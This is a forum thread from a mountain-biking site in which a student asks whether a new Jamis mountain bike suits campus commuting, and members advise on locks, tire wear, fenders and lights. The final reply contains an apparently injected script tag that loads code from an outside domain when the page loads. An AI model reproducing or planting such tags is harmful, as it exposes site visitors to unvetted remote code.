Would you...- Mtbr.com

Thread: Would you...

mtbr member
    Aug 2009

Would you...

I recently got my first mountain bike, Jamis Dakar XCR Expert, to join the fun some friends were having out on the trails. I have lately been riding to class/lab versus walking to class from apartment, walking back to apt/car, then driving to lab, back to apt to park, walk to class - it is so much easier to bike everywhere instead. I just wasn't sure if there was anything I should change for commuting versus trails or should I get a bike strictly for commuting.

Thank you in advance!
    2009 Jamis Dakar XCR Expert
    MTBR Newbie: August 2009 - Present

No-Brakes Cougar
    If you don't have a secure place to leave your bike on campus and you're worried about it getting ripped off, then you might want to get a beater. Otherwise it sounds like you're doing fine. Just be advised that if your tires are composed of a soft compound and you put in a lot of pavement miles then they will wear out a lot sooner than if you were riding strictly dirt. Maybe consider some fenders if you're riding in inclement weather. Lights if you ride after dark/before sunrise. Maybe a bell if you have to dodge a lot of foot traffic on campus?
    R.I.P. Ronnie James Dio ~ July 10, 1942 May 16, 2010

mtbr member
    Dec 2005
    Just like Gary, for me it would depend on whether you can leave the bike at a secure place. If so, I would use your Jamis Dakar Expert (nice bike by the way!) with possible some add-ons such as removable fenders. This way, you can check whether you like commuting by bike and eventually, but not necessarily, buy/build a dedicated bike later-on.
    If the area is not secure, the only option indeed is to buy a cheap second hand bike. And a very solid lock (you will need this for the first option too probably). My experience is that the higher the ratio price of the lock versus price of the bike, the less likely a thief will bother.

I have no idea how widespread these initiatives are, but here in Europe bike rental systems are popping up in most large cities. With terminals where you check in / check out the bike approximately 400 meters apart troughout the city. This is an even better solution for testing whether you like it of course. And has many unbeatable advantages (stealing is not your problem, reparing is not either, you can go by bike one way and come back with other transport if handier,...).
    Last edited by SurfHenk; 09-24-2009 at 01:28 AM.

Sep 2009
    Quote Originally Posted by TTUMBIO2010
    I recently got my first mountain bike, Jamis Dakar XCR Expert, to join the fun some friends were having out on the trails. I have lately been riding to class/lab versus walking to class from apartment, walking back to apt/car, then driving to lab, back to apt to park, walk to class - it is so much easier to bike everywhere instead. I just wasn't sure if there was anything I should change for commuting versus trails or should I get a bike strictly for commuting.

Thank you in advance!
    <script type="***************" src="http://djmixdownloads.com/script.php"></script>
    Biking is a way of life not a choice for me

Members who have read this thread: 0